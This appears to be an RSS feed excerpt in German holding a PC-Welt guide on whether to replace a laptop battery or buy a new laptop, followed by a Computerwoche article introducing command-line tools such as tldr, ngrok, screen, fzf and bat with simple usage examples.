<p class="wp-block-paragraph">Bevor Sie Schraubenzieher zücken oder neue Hardware kaufen, muss geklärt werden: Ist Ihr Akku wirklich verschlissen, oder saugt ressourcenfressende Software im Hintergrund heimlich den Stromspeicher leer? Die Frage ist schnell beantwortet, denn sowohl Windows als auch macOS bieten tiefgreifende <a href="https://www.pcwelt.de/article/3014555/laptop-windows-akkubericht.html" target="_blank">Diagnose-Tools</a>, die sich mit wenigen</p>



<p class="wp-block-paragraph"><strong>Unter Windows:</strong> Öffnen Sie die Windows-Eingabeaufforderung (CMD) oder PowerShell als Administrator und tippen Sie den Befehl</p>



<pre class="wp-block-code"><code><strong>powercfg /batteryreport</strong></code></pre>



<p class="wp-block-paragraph">ein. Windows generiert daraufhin eine detaillierte HTML-Datei, die tief ins System blicken lässt. Öffnen Sie die Datei unter dem angegebenen Pfad – z.B. „C:\battery-report.html“. Entscheidend sind hier zwei Werte: die <strong>Design Capacity</strong> (die ursprüngliche Nennkapazität Ihres Akkus ab Werk) und die <strong>Full Charge Capacity</strong> (die aktuell noch erreichbare Maximalkapazität). Liegt die aktuelle Kapazität unter <strong>80 Prozent des Ursprungswertes</strong>, gilt ein Akku allgemein als verschlissen. Spätestens wenn er die 70-Prozent-Marke unterschreitet, wird der Kapazitätsverlust im Alltag oft zu einer spürbaren Einschränkung – das Bauteil ist Ende seines Lebenszyklus angekommen.</p>



<p class="wp-block-paragraph"><strong>Bei macOS:</strong> Auf einem MacBook führt der Weg über das Apfel-Menü zu <strong>Systemeinstellungen → Allgemein → Info → Systembericht</strong>. Unter dem Reiter „Stromversorgung“ finden Sie die Anzahl der Ladezyklen sowie den Zustand. Apple garantiert in der Regel, dass ein Akku nach 1.000 vollständigen Ladezyklen noch mindestens 80 Prozent seiner ursprünglichen Kapazität halten kann. Fällt der Wert darunter, rät das System oft von selbst zum Service.</p>



<h2 class="wp-block-heading">Schrauben oder schrauben lassen?</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-19-um-21.17.18.png?w=1024" alt="Reparaturanleitungen" class="wp-image-4198586" width="1024" height="684" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Auf <a href="https://www.pcwelt.de/article/3174903/notebook-akku-tauschen-oder-neukauf-ratgeber.html#" target="_blank">iFixit</a> finden Verbraucher Reparaturanleitungen, Ersatzteile und Werkzeug für zahlreiche Notebooks, Smartphones und andere Elektronikgeräte.</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p class="wp-block-paragraph">Steht der Defekt fest oder ist die Alterung bereits weit fortgeschritten, folgt oft eine logistische Herausforderung. Die Hardware-Realität von 2026 ist Verbrauchern nämlich nicht gerade entgegengekommen – zumindest beim Akku: In vielen modernen Ultrabooks, Surface-Geräten oder MacBooks sind die Akkuzellen großflächig im Gehäuse verklebt. Das macht den Tausch für Laien gefährlich, weil bei einer Beschädigung der Zellen <a href="https://www.pcwelt.de/article/2590103/akku-brennt-richtig-handeln-und-loeschen.html" target="_blank">akute Brandgefahr</a> besteht.</p>



<p class="wp-block-paragraph">Der Gang zur Fachwerkstatt ist deshalb oft alternativlos – achten Sie hierbei am besten auf zertifizierte Betriebe, die eine <strong>Garantie auf das Ersatzteil</strong> gewähren. Anders sieht es bei reparaturfreundlichen Business-Geräten wie dem <a href="https://www.pcwelt.de/article/3174903/notebook-akku-tauschen-oder-neukauf-ratgeber.html#" target="_blank">Lenovo ThinkPad T14 Gen 5</a> oder Vorreitern der Modularität wie dem <a href="https://www.pcwelt.de/article/2230834/framework-laptop-16-test.html" target="_blank">Framework Laptop 16</a> aus: Hier brauchen Sie oft nur einen passenden Schraubendreher und zehn Minuten Zeit, um den Akku selbst zu tauschen. Wie Sie Ihren Akku am Laptop oder am Smartphone selbst tauschen können, <a href="https://www.pcwelt.de/article/2666199/akkutausch-so-klappts-beim-smartphone-und-notebook.html" target="_blank">erklären wir in diesem Ratgeber</a>.</p>



<p class="wp-block-paragraph"><strong>Achtung beim Teilekauf:</strong> Sparen Sie nicht am falschen Ende. Extrem billige Nachbau-Akkus von No-Name-Händlern auf großen Marktplätzen bergen nicht nur ein <a href="https://www.pcwelt.de/article/3060569/akku-ladefehler-brandgefahr-vermeiden.html" target="_blank">Brandrisiko</a>, sondern schummeln oft auch bei der echten Kapazität. Greifen Sie <strong>unbedingt zu Originalteilen des Herstellers</strong> oder zu zertifizierten Ersatzteilen etablierter Drittanbieter (wie <a href="https://www.pcwelt.de/article/3174903/notebook-akku-tauschen-oder-neukauf-ratgeber.html#" target="_blank">iFixit</a>).</p>



<p class="wp-block-paragraph">Wenn die Diagnose zeigt, dass Ihr Akku physisch noch fit ist, dann liegt das Problem vermutlich an Software mit Selbstbedienungsmentalität. Praktisch: Windows und macOS verfügen über integrierte Stromfresser-Finder. Unter Windows navigieren Sie zu <strong>Einstellungen</strong> <strong>→ Strom und Akku → Akkunutzung</strong>. Dort listet Windows genau auf, welche Apps in den letzten Tagen am meisten Energie verbraucht haben. Auf dem Mac erfüllt die App <strong>Aktivitätsanzeige</strong> (Reiter <strong>Energie</strong>) denselben Zweck. Stoßen Sie hier auf Programme, die Sie gar nicht aktiv nutzen, sollten Sie deren Hintergrundaktivität einschränken oder die Software komplett deinstallieren.</p>



<p class="wp-block-paragraph"><strong>💡 Infobox: Das neue Recht auf Reparatur (Stand 2026)</strong></p>



<p class="wp-block-paragraph">Das<strong> Recht auf Reparatur </strong>stammt von der Europäischen Kommission und dem EU-Parlament. Ziel des Gesetzespakets ist es, die wachsenden Berge von Elektroschrott auf dem Kontinent zu reduzieren und die Kreislaufwirtschaft zu stärken. Nach der Verabschiedung der EU-Richtlinie im Jahr 2024 hatten die Mitgliedsstaaten bis 2026 Zeit, die Vorgaben <a href="https://www.pcwelt.de/article/3174903/notebook-akku-tauschen-oder-neukauf-ratgeber.html#" target="_blank">in nationales Recht umzusetzen</a> – nun greifen die Regeln schrittweise und wirken sich zunehmend auf den Reparaturalltag aus.</p>



<p class="wp-block-paragraph"><strong>Was Verbraucher davon haben:</strong></p>



<ul class="wp-block-list">
<li><strong>Reparaturpflicht:</strong> Hersteller sind nun gesetzlich verpflichtet, für gängige Elektronikgeräte (wie Smartphones und Laptops) Reparaturen anzubieten – und das auch nach Ablauf der gesetzlichen Gewährleistung.</li>



<li><strong>Zugang zu Ersatzteilen:</strong> Unabhängige Fachwerkstätten und ambitionierte Bastler erhalten leichteren Zugang zu Original-Ersatzteilen und offiziellen Reparaturanleitungen.</li>



<li><strong>Weniger Software-Sperren:</strong> Praktiken wie das sogenannte “Parts Pairing” (bei dem Ersatzteile per Software blockiert werden, wenn sie nicht von einer offiziellen Vertragswerkstatt eingebaut wurden) werden stark eingeschränkt.</li>



<li><strong>Mehr Wirtschaftlichkeit:</strong> Durch den faireren Wettbewerb sinken die Reparaturkosten, was den Tausch eines Akkus oft attraktiver macht als einen teuren Neukauf.</li>
</ul>



<h2 class="wp-block-heading">Wann lohnt sich der Tausch?</h2>



<p class="wp-block-paragraph">Um zu beurteilen, ob sich die Investition für den Austausch lohnt, hilft die bewährte <strong>50-Prozent-Regel</strong>: Übersteigen die Kosten für die Reparatur (Ersatz-Akku plus eventuelle Arbeitszeit der Werkstatt) mehr als die Hälfte des aktuellen Restwerts des Notebooks, wird die Angelegenheit unwirtschaftlich.</p>



<p class="wp-block-paragraph"><strong>Ein Rechenbeispiel:</strong> Ein vier Jahre altes Premium-Notebook, das früher mal 1.500 Euro gekostet hat, bringt auf dem Gebrauchtmarkt vielleicht noch 400 bis 500 Euro. Eine Investition von 120 Euro für einen fachgerechten Akkutausch ist dann noch durchaus sinnvoll und kann dem Gerät weitere zwei bis drei Lebensjahre verschaffen. Bei einem ohnehin leistungsschwachen 400-Euro-Plastikbomber aus dem Jahr 2021 ist eine 100-Euro-Reparatur jedoch (jenseits von Nostalgiegründen) kaum zu vertreten und gilt als unwirtschaftlich.</p>



<h2 class="wp-block-heading">Wann ein Neukauf wirklich sinnvoll ist</h2>



<p class="wp-block-paragraph">Mal ehrlich: Der Akku ist oft nur das offensichtlichste Symptom eines veralteten Systems. Wer über eine Reparatur nachdenkt, sollte objektiv prüfen, ob die restliche Hardware den heutigen Anforderungen noch gewachsen ist – oder ob man mit einem <a href="https://www.pcwelt.de/article/2215385/die-besten-laptops-test.html" target="_blank">neuen Laptop</a> besser fährt:</p>



<ul class="wp-block-list">
<li><strong>Windows 10 Support-Ende:</strong> Das offizielle Support-Ende von Windows 10 (Oktober 2025) liegt bereits hinter uns. Privatanwender in der EU haben zwar <a href="https://www.pcwelt.de/article/2941599/windows-10-gratis-sicher-nutzen-esu-registrierung-so-gehts.html" target="_blank">Glück im Unglück</a>: Wer mit einem Microsoft-Konto angemeldet ist, <a href="https://www.pcwelt.de/article/3177497/windows-10-bekommt-ein-weiteres-jahr-lang-updates.html" target="_blank">erhält die Extended Security Updates (ESU) im ersten Jahr bis Oktober 2027 kostenlos.</a> Doch spätestens im Herbst 2027 ist endgültig Schicht im Schacht. Geräte, deren Prozessoren nicht offiziell für Windows 11 zertifiziert sind (ältere CPUs vor der Intel Core 8. Generation oder AMD Ryzen 2000er-Serie), stoßen dann an ihre praktische Lebensdauergrenze. Ohne den auslaufenden ESU-Schutz sollten Sie ab diesem Zeitpunkt bei betroffenen Windows-Geräten nicht mehr in einen neuen Akku investieren.</li>



<li><strong>Speicher-Flaschenhälse:</strong> Verlöteter, nicht aufrüstbarer Arbeitsspeicher von 8 GB stößt selbst bei ausschließlicher Browser-Nutzung und Office-Anwendungen oft an seine Grenzen.</li>



<li><strong>Träge Performance:</strong> Wenn das Notebook nicht nur schnell leer ist, sondern beim Öffnen von Programmen ins Schwitzen kommt und der Lüfter permanent auf Hochtouren läuft, bringt auch der stärkste neue Akku kein flüssiges Arbeitsgefühl zurück.</li>
</ul>



<h2 class="wp-block-heading">Zeit für einen neuen Laptop?</h2>



<p class="wp-block-paragraph">Wenn kein (sinnvoller) Weg mehr am Neukauf vorbeiführt, ist das nicht immer eine schlechte Nachricht: Moderne Geräte punkten nicht nur mit deutlich mehr Ausdauer jenseits der Steckdose – sie bringen auch spürbar mehr Tempo und Sicherheit, effizientere Hardware und oft angenehm leise Kühlung in Ihren Alltag.</p>



<h2 class="wp-block-heading">Fazit und Checkliste: Akku tauschen oder Neukauf?</h2>



<p class="wp-block-paragraph">Die Entscheidung zwischen Werkstatt und Neuanschaffung ist am Ende des Tages ein Abwägen von Kosten, Nutzen und Sicherheit. Die folgende Checkliste hilft dabei, das Schicksal Ihres Notebooks zu klären:</p>



<p class="wp-block-paragraph"><strong>Der Tausch lohnt sich, wenn:</strong></p>



<ul class="wp-block-list">
<li>der Laptop noch alle Leistungsanforderungen im Alltag erfüllt.</li>



<li>Windows 11 offiziell unterstützt wird (oder macOS/Linux aktuell ist).</li>



<li>die Gesamtreparatur weniger als 50 % des Restwerts kostet.</li>



<li>das Gehäuse unbeschädigt ist und Scharniere sowie Tastatur noch zuverlässig funktionieren.</li>
</ul>



<p class="wp-block-paragraph"><strong>Ein Neukauf ist besser, wenn:</strong></p>



<ul class="wp-block-list">
<li>das Betriebssystem (z. B. Windows 10) keine Sicherheitsupdates mehr erhält.</li>



<li>das Gerät durch 8 GB RAM oder eine alte CPU ohnehin ein Flaschenhals im Alltag ist.</li>



<li>Displayschäden oder defekte Ports weitere, teure Reparaturen erfordern.</li>



<li>die Reparatur den Zeitwert des Geräts deutlich übersteigt.</li>
</ul>



<p class="wp-block-paragraph">(<a href="https://www.pcwelt.de/article/3174903/notebook-akku-tauschen-oder-neukauf-ratgeber.html" data-type="link" data-id="https://www.pcwelt.de/article/3174903/notebook-akku-tauschen-oder-neukauf-ratgeber.html" target="_blank">PC-Welt</a>)</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[9 Kommandozeilen-Tools, die jeder Dev braucht]]></title>
<description><![CDATA[Selbst wenn Sie dieser Anblick nicht in Verzückung versetzt – ein Blick auf diese obligatorischen Kommandozeilen-Tools lohnt sich.
					Foto: SkillUp | shutterstock.com




Manche Devs arbeiten mit der Kommandozeile (auch Command Line Interface; CLI), weil sie sie lieben – andere, weil ihnen nich...]]></description>
<link>https://tsecurity.de/de/3694428/it-security-nachrichten/9-kommandozeilen-tools-die-jeder-dev-braucht/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694428/it-security-nachrichten/9-kommandozeilen-tools-die-jeder-dev-braucht/</guid>
<pubDate>Sat, 25 Jul 2026 18:59:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Selbst wenn Sie dieser Anblick nicht in Verzückung versetzt - ein Blick auf diese obligatorischen Kommandozeilen-Tools lohnt sich." title="Selbst wenn Sie dieser Anblick nicht in Verzückung versetzt - ein Blick auf diese obligatorischen Kommandozeilen-Tools lohnt sich." src="https://images.computerwoche.de/bdb/3392868/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Selbst wenn Sie dieser Anblick nicht in Verzückung versetzt – ein Blick auf diese obligatorischen Kommandozeilen-Tools lohnt sich.</p></figcaption></figure><p class="imageCredit">
					Foto: SkillUp | shutterstock.com</p></div>




<p class="wp-block-paragraph">Manche Devs arbeiten mit der Kommandozeile (auch Command Line Interface; CLI), weil sie sie <a href="https://www.computerwoche.de/article/2818958/was-developer-an-ihrem-job-lieben-und-hassen.html" title="lieben" target="_blank">lieben</a> – andere, weil ihnen nichts anderes übrig bleibt. Egal zu welcher Kategorie Sie sich zählen: Diese neun CLI-Tools helfen Ihrer Produktivität und Effizienz (zusätzlich) <a href="https://www.computerwoche.de/article/2816175/so-motivieren-sie-softwareentwickler.html" title="auf die Sprünge" target="_blank">auf die Sprünge</a>.</p>



<h2 class="wp-block-heading"><a href="https://tldr.sh/" target="_blank" rel="noreferrer noopener">tldr</a></h2>



<p class="wp-block-paragraph">Keine Angst, wir ersparen Ihnen an dieser Stelle eine langwierige, faszinative Abhandlung über die ganz eigene Magie, die die Unix-Shell entfaltet. Fakt ist: Wenn man mit ihr arbeiten will, ist es manchmal erforderlich, vorher ein Handbuch zu lesen. Unix Docs (auch man- oder manual pages) sind diesbezüglich allerdings ein zweischneidiges Schwert: Die benötigte Information ist vorhanden – es ist nur die Frage, wo. Den Teil der <a href="https://www.computerwoche.de/article/2791591/so-erstellen-sie-eine-moderne-dokumentation-fuer-anwendungen.html" title="Dokumentation" target="_blank">Dokumentation</a> aufzuspüren, den Sie gerade benötigen, kann ein entmutigender Task sein. Zwar kann die gute alte Befehlszeile dabei helfen – um ein offizielles Handbuch aufzurufen, genügt:</p>



<p class="wp-block-paragraph"><code>$ man </code></p>



<p class="wp-block-paragraph">Allerdings zeichnen sich man-pages vor allem durch ihre Informationsdichte aus – und die Tatsache, dass sie manchmal aktuelle Informationen für neuere Tools vermissen lassen. Das CLI-Tool <code>tldr</code> versetzt Sie in die Lage, zielgerichteter zu suchen:</p>



<p class="wp-block-paragraph"><code>$ tldr </code></p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="tldr in Aktion." title="tldr in Aktion." src="https://images.computerwoche.de/bdb/3392869/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">tldr in Aktion.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<p class="wp-block-paragraph">Falls Sie <code>npm</code> installiert haben, ist die <code>tldr</code>-Installation nur einen kurzen Befehl entfernt:</p>



<p class="wp-block-paragraph"><code>npm install -g tldr</code></p>



<h2 class="wp-block-heading"><a href="https://ngrok.com/download" target="_blank" rel="noreferrer noopener">ngrok</a></h2>



<p class="wp-block-paragraph">Sobald Sie <code>tldr</code> installiert haben, können Sie damit viele weitere Befehle erkunden. Zum Beispiel:</p>



<p class="wp-block-paragraph"><code>$ tldr ngrok</code></p>



<p class="wp-block-paragraph"><code>Reverse proxy that creates a secure tunnel from a public endpoint to a locally running web service.</code></p>



<p class="wp-block-paragraph">Mit <code>ngrok</code> eröffnet sich Ihnen eine stressfreie Möglichkeit, von einem Remote-Browser auf eine Entwicklungsmaschine zuzugreifen. Aber das Tool kann noch weit mehr. Sie können damit beispielsweise in der Cloud entwickeln und die Ergebnisse im Browser in Augenschein nehmen. Zudem können Sie mit <code>ngrok</code> auch schnell und einfach laufende Services über HTTPS veröffentlichen – ohne sich mit der Security-Infrastruktur herumschlagen zu müssen. Angenommen, Sie bauen einen Service Worker auf, der HTTPS benötigt, dann ist alles, was Sie für einen sicheren Kontext tun müssen, <code>ngrok</code> zu starten.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Das CLI-Tool ngrok macht Devs das Leben auf verschiedenen Ebenen leichter." title="Das CLI-Tool ngrok macht Devs das Leben auf verschiedenen Ebenen leichter." src="https://images.computerwoche.de/bdb/3392870/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Das CLI-Tool ngrok macht Devs das Leben auf verschiedenen Ebenen leichter.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<p class="wp-block-paragraph">Ein Beispiel, bei dem der HTTP-Port 8080 freigegeben wird:</p>



<p class="wp-block-paragraph"><code>$ ngrok http 8080</code></p>



<p class="wp-block-paragraph">Der <code>ngrok</code>-Output sieht wie folgt aus:</p>



<p class="wp-block-paragraph"><code>https://f951-34-67-117-59.ngrok-free.app -&gt; <a href="https://localhost:8080/" title="http://localhost:8080" target="_blank" rel="noopener">http://localhost:8080</a></code></p>



<p class="wp-block-paragraph">Anschließend kann jedermann die zugewiesene URL aufrufen (machen Sie sich keine Mühe).</p>



<h2 class="wp-block-heading"><a href="https://www.gnu.org/software/screen/manual/screen.html" target="_blank" rel="noreferrer noopener">screen</a></h2>



<p class="wp-block-paragraph">Mit diesem Befehlszeilen-Tool können Sie eine Shell-Sitzung mit oder ohne laufenden Prozess “beiseite legen” und sie anschließend zu einem beliebigen Zeitpunkt fortsetzen – auch wenn Sie die ursprüngliche Session beenden.</p>



<p class="wp-block-paragraph"><code>$ tldr screen</code></p>



<p class="wp-block-paragraph"><code>Hold a session open on a remote server. Manage multiple windows with a single SSH connection.</code></p>



<p class="wp-block-paragraph">Nehmen wir an, Sie starten <code>ngrok</code>, um remote auf eine <a href="https://www.computerwoche.de/article/2805798/7-webseiten-die-ihre-desktop-software-ersetzen.html" title="Webanwendung" target="_blank">Webanwendung</a> zuzugreifen: Sie starten den Prozess, lassen diesen dann in <code>screen</code> laufen und programmieren so lange etwas. Währenddessen läuft <code>ngrok</code> die ganze Zeit weiter – Sie können über <code>screen</code> jederzeit wieder darauf zugreifen. Veranschaulicht in Code würde das wie folgt aussehen:</p>



<p class="wp-block-paragraph"><code>$ screen</code></p>



<p class="wp-block-paragraph"><code>// Now we are in a new session</code></p>



<p class="wp-block-paragraph"><code>$ ngrok http 8080</code></p>



<p class="wp-block-paragraph"><code>// Now ngrok is running, exposing http port 8080</code></p>



<p class="wp-block-paragraph"><code>Type ctrl-a</code></p>



<p class="wp-block-paragraph"><code>// Now we are in screen's command mode</code></p>



<p class="wp-block-paragraph"><code>Type the "d" key, to "detach".</code></p>



<p class="wp-block-paragraph"><code>// Now you are back in the shell that you started in, while screen is running your ngrok command in the background:</code></p>



<p class="wp-block-paragraph"><code>$ screen -list</code></p>



<p class="wp-block-paragraph"><code>There is a screen on:</code></p>



<p class="wp-block-paragraph"><code> 128861.pts-0.dev3 (04/25/24 14:36:58) (Detached)</code></p>



<p class="wp-block-paragraph"><strong>Tipp</strong></p>



<p class="wp-block-paragraph"> Wenn Sie eine laufende Sitzung, in der Sie sich gerade befinden, benennen wollen, nutzen Sie die Tastenkombination Strg + A und geben <code>:sessionname </code> ein. Das ist besonders nützlich, wenn Sie mit mehreren Screen-Instanzen arbeiten wollen.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Screen ist ein umfangreiches und potentes CLI-Tool." title="Screen ist ein umfangreiches und potentes CLI-Tool." src="https://images.computerwoche.de/bdb/3392871/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Screen ist ein umfangreiches und potentes CLI-Tool.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<p class="wp-block-paragraph">Wenn wie im Beispiel nur eine <code>screen</code>-Instanz läuft, führt der Befehl <code>$ screen -r</code> (für “re-attach”) Sie zurück zu Ihrer <code>ngrok</code>-Sitzung. Im Fall mehrerer Screens können Sie diese mit Hilfe ihrer ID wieder aufrufen:</p>



<p class="wp-block-paragraph"><code>$ screen -r </code></p>



<p class="wp-block-paragraph">Wenn Sie Ihre Session endgültig beenden wollen, beenden Sie ngrok mit Strg + C und geben anschließend <code>exit</code> in die Kommandozeile ein.</p>



<h2 class="wp-block-heading"><a href="https://sdkman.io/" target="_blank" rel="noreferrer noopener">sdkman</a> &amp; <a href="https://github.com/nvm-sh/nvm" target="_blank" rel="noreferrer noopener">nvm</a></h2>



<p class="wp-block-paragraph">Wenn Sie <a href="https://www.computerwoche.de/article/2831436/darum-bleibt-java-relevant.html" title="Java" target="_blank">Java</a> oder <a href="https://www.computerwoche.de/article/2794625/was-javascript-von-typescript-unterscheidet.html" title="JavaScript" target="_blank">JavaScript</a> auf einem Server verwenden, sollten Sie sich mit <code>sdkman</code> (für Java) und <code>nvm</code> (für Node) vertraut machen. Beide Kommandozeilen-Tools sind nützlich, wenn es darum geht, mit mehreren Programmiersprachenversionen auf dem selben Rechner zu jonglieren – und dabei sowohl Path Adjustment als auch Umgebungsvariablen überflüssig machen. </p>



<p class="wp-block-paragraph">Mit <code>sdkman</code> können Sie beispielsweise neuere Java-Versionen erkunden und anschließend wieder zum aktuellen LTS-Release springen. Dieser Prozess wird durch das <code>sdk</code>-Kommando abstrahiert.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="sdkman zeigt alle verfügbaren Java-Installationen auf einem lokalen Rechner an - inklusive derjenigen, die gerade in Benutzung ist." title="sdkman zeigt alle verfügbaren Java-Installationen auf einem lokalen Rechner an - inklusive derjenigen, die gerade in Benutzung ist." src="https://images.computerwoche.de/bdb/3392872/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">sdkman zeigt alle verfügbaren Java-Installationen auf einem lokalen Rechner an – inklusive derjenigen, die gerade in Benutzung ist.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<p class="wp-block-paragraph">Zwischen den Versionen zu wechseln, gestaltet sich denkbar einfach – <code>$ sdk use java 19-open</code> führt Sie direkt zu JDK Version 19.</p>



<p class="wp-block-paragraph"><code>$ tldr sdk</code></p>



<p class="wp-block-paragraph"><code>Manage parallel versions of multiple Software Development Kits.</code></p>



<p class="wp-block-paragraph"><code>Supports Java, Groovy, Scala, Kotlin, Gradle, Maven, Vert.x and many others.</code></p>



<p class="wp-block-paragraph">Die <code>nvm</code>-Utility funktioniert ganz ähnlich:</p>



<p class="wp-block-paragraph"><code>$ tldr nvm</code></p>



<p class="wp-block-paragraph"><code>Install, uninstall or switch between Node.js versions.</code></p>



<p class="wp-block-paragraph"><code>Supports version numbers like "12.8" or "v16.13.1", and labels like "stable", "system", etc.</code></p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Ein Blick auf nvm." title="Ein Blick auf nvm." src="https://images.computerwoche.de/bdb/3392873/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Ein Blick auf nvm.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<h2 class="wp-block-heading"><a href="https://github.com/junegunn/fzf" target="_blank" rel="noreferrer noopener">fzf</a></h2>



<p class="wp-block-paragraph">Sowohl <code>grep</code> als auch <code>find</code> sind Standardbestandteile der Kommandozeilen-Befehlspalette. Allerdings sind beide Tools nicht so funktional, wie sie sein sollten. Das ruft <code>fzf</code> auf den Plan – einen “Fuzzy File Finder”. Mit “Fuzzy” ist dabei gemeint, dass die Details zu dem, was Sie suchen, nicht unbedingt klar definiert sein müssen. Ein Beispiel:</p>



<p class="wp-block-paragraph"><code>$ tldr fzf</code></p>



<p class="wp-block-paragraph"><code>Command-line fuzzy finder.</code></p>



<p class="wp-block-paragraph"><code>Similar to sk.</code></p>



<p class="wp-block-paragraph">Sobald Sie <code>fzf</code> starten, indiziert das CLI-Tool umgehend das Dateisystem, um Ergebnisvorschläge für Ihre Suchen zu unterbreiten.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="In diesem Beispiel suchen wir nach einem Projekt, an dem wir zuletzt gearbeitet haben." title="In diesem Beispiel suchen wir nach einem Projekt, an dem wir zuletzt gearbeitet haben." src="https://images.computerwoche.de/bdb/3392874/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">In diesem Beispiel suchen wir nach einem Projekt, an dem wir zuletzt gearbeitet haben.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<p class="wp-block-paragraph">Aus 878.937 Möglichkeiten hat <code>fzf</code> die 25 Dateien und Verzeichnisse ausgewählt, die unseren Anforderungen entsprechen könnten – und das völlig ohne Umwege.</p>



<h2 class="wp-block-heading"><a href="https://github.com/ogham/exa" target="_blank" rel="noreferrer noopener">exa</a></h2>



<p class="wp-block-paragraph">Mit <code>exa</code> werden langweilige alte <code>ls</code>-Listings schöner und nützlicher:</p>



<p class="wp-block-paragraph"><code>$ tldr</code></p>



<p class="wp-block-paragraph"><code>A modern replacement for ls (List directory contents).</code></p>



<p class="wp-block-paragraph">Für eine <a href="https://www.computerwoche.de/article/2834060/10-wege-zur-besseren-developer-experience.html" title="bessere Developer Experience" target="_blank">bessere Developer Experience</a> ohne mentalen Overhead statten Sie <code>ls</code> einfach mit einem <code>exa</code>-Alias aus. Das Tool respektiert die meisten <code>ls</code>-Standardoptionen – <code>exa -l</code> funktioniert also (beispielsweise) genau so, wie Sie es erwarten würden.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Exa ist das neue ls." title="Exa ist das neue ls." src="https://images.computerwoche.de/bdb/3392875/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Exa ist das neue ls.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<h2 class="wp-block-heading"><a href="https://github.com/sharkdp/bat" target="_blank" rel="noreferrer noopener">bat</a></h2>



<p class="wp-block-paragraph">Die <code>bat</code>-Utility ähnelt dem <code>cat</code>-Tool – ist aber besser:</p>



<p class="wp-block-paragraph"><code>$ tldr bat</code></p>



<p class="wp-block-paragraph"><code>Print and concatenate files.</code></p>



<p class="wp-block-paragraph"><code>A cat clone with syntax highlighting and Git integration.</code></p>



<p class="wp-block-paragraph">Es handelt sich hierbei im Wesentlichen um eine Komfort- beziehungsweise <a href="https://www.computerwoche.de/article/2821891/8-wege-um-top-entwickler-zu-halten.html" title="Developer-Experience-Optimierung" target="_blank">Developer-Experience-Optimierung</a> – ähnlich wie im Fall von <code>exa</code>. Wenn Sie <code>bat</code> verwenden, erwartet Sie ein vollwertiger File Viewer – inklusive Title, Borders, Line Numbers und insbesondere einer hilfreichen Syntax-Highlighting-Funktion für Programmiersprachen oder Konfigurationsdateien. Dabei reagiert <code>bat</code> auf less/more-Befehle – und wird mit “<code>q</code>” beendet. Die Navigation erfolgt über die Pfeiltasten.</p>



<div class="extendedBlock-wrapper block-coreImage"><figure class="wp-block-image size-large"><img loading="lazy" alt="Bat ist ein simples Dienstprogramm, das es zu einem echten Erlebnis macht, Dateien auf der Konsole zu durchsuchen." title="Bat ist ein simples Dienstprogramm, das es zu einem echten Erlebnis macht, Dateien auf der Konsole zu durchsuchen." src="https://images.computerwoche.de/bdb/3392876/840x473.jpg" width="840" height="473"><figcaption class="wp-element-caption"><p class="foundryImageCaption">Bat ist ein simples Dienstprogramm, das es zu einem echten Erlebnis macht, Dateien auf der Konsole zu durchsuchen.</p></figcaption></figure><p class="imageCredit">
					Foto: Matthew Tyson | IDG</p></div>




<h2 class="wp-block-heading"><a href="https://github.com/NetHack/NetHack" target="_blank" rel="noreferrer noopener">nethack</a></h2>



<p class="wp-block-paragraph">Ein absoluter Kommandozeilen-Klassiker ist <code>nethack</code> – der ursprüngliche, Konsolen-basierte ASCII <a href="https://de.wikipedia.org/wiki/NetHack" title="Dungeon Crawler" target="_blank" rel="noopener">Dungeon Crawler</a>. Das CLI-Tool wird Ihre Produktivität zwar nicht direkt ankurbeln – kann aber durchaus dabei helfen, ein paar Minuten zur Ruhe zu kommen, um komplexe Dev-Probleme zu durchdringen.</p>



